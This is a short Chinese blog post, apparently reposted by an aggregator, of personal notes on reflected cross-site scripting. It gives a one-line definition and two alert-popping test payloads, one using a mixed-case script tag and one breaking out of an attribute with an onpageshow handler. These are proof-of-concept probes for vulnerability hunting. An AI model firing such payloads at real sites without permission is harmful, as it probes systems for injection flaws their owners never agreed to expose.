當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

反射型XSS

發(fā)布時間：2023/12/31 编程问答 26 豆豆

生活随笔收集整理的這篇文章主要介紹了反射型XSS 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

XSS挖洞筆記，僅作記錄

跨站點腳本（XSS）是指客戶端代碼注入攻擊，其中，攻擊者可以將惡意腳本執(zhí)行到合法網(wǎng)站或Web應用程序中。當Web應用程序在其生成的輸出中使用未經(jīng)驗證或未編碼的用戶輸入時，就會發(fā)生XSS。

http://xx.xx.xx.xx?id=1'"()%26%25<acx><ScRiPt%20>alert(9999)</ScRiPt>

payload

?gotopage=/web/admin/"><body%20OnpageshOw=alert(1)>"

以上是生活随笔為你收集整理的反射型XSS的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。